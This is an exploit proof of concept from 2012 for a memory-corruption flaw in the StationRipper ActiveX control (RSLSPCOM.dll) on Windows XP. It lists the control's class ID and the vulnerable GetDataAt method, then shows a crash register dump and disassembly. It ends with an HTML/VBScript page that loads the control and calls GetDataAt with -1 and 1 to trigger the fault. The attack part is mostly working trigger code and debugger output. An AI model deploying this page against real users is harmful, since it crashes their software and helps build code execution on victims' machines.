Exploit Title: stationripper ActiveX (RSLSPCOM.dll) BoF PoC Date: July 19, 2012 Author: coolkaveh coolkaveh () rocketmail com Https://twitter.com/coolkaveh Vendor Homepage: www.stationripper.com Version: 2.98.3/1 Tested on: windows XP SP3 --------------------------------------------------------------------------------------- cheers to awesome hippie flaw hunter --------------------------------------------------------------------------------------- Class SSLDataContainer GUID: {E52990C2-7CED-4756-9B3B-6188A5B41704} GetDataAt Function GetDataAt ( ByVal lPos As Long , ByVal lHowMuch As Long ) As String ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ EIP 003B1191 EAX 00000000 EBX 003BB3BC -> 003B3904 ECX 003D2120 -> BAADF00D EDX 00000000 EDI FFFFFFFF ESI 00000000 EBP 0013EDA4 -> 0013EDCC ESP 0013ED64 -> 003BB3BC Block Disassembly: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 3B1181 MOV DL,AL 3B1183 AND DL,F 3B1186 SHL DL,2 3B1189 OR [EBP+13],DL 3B118C SHR AL,4 3B118F MOV DL,AL 3B1191 MOV AL,[EDI] <--- CRASH 3B1193 MOV BL,AL 3B1195 AND BL,3 3B1198 SHL BL,4 3B119B OR DL,BL 3B119D SHR AL,2 3B11A0 MOV [EBP+F],AL 3B11A3 MOV EAX,[EBP-4] 3B11A6 SUB [EBP-8],EAX ArgDump: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ EBP+8 003D2120 -> BAADF00D EBP+12 FFFFFFFF EBP+16 00000001 EBP+20 00000005 EBP+24 00000001 EBP+28 00000000 <html> Exploit <object classid='clsid:E52990C2-7CED-4756-9B3B-6188A5B41704' id='xpl' ></object> <script language='vbscript'> targetFile = "C:\Program Files\Ratajik Software\StationRipper\RSLSPCOM.dll" prototype = "Function GetDataAt ( ByVal lPos As Long , ByVal lHowMuch As Long ) As String" memberName = "GetDataAt" progid = "SSLHIJACKCLIENTCOMLib.SSLDataContainer" argCount = 2 arg1=-1 arg2=1 xpl.GetDataAt arg1 ,arg2 </script>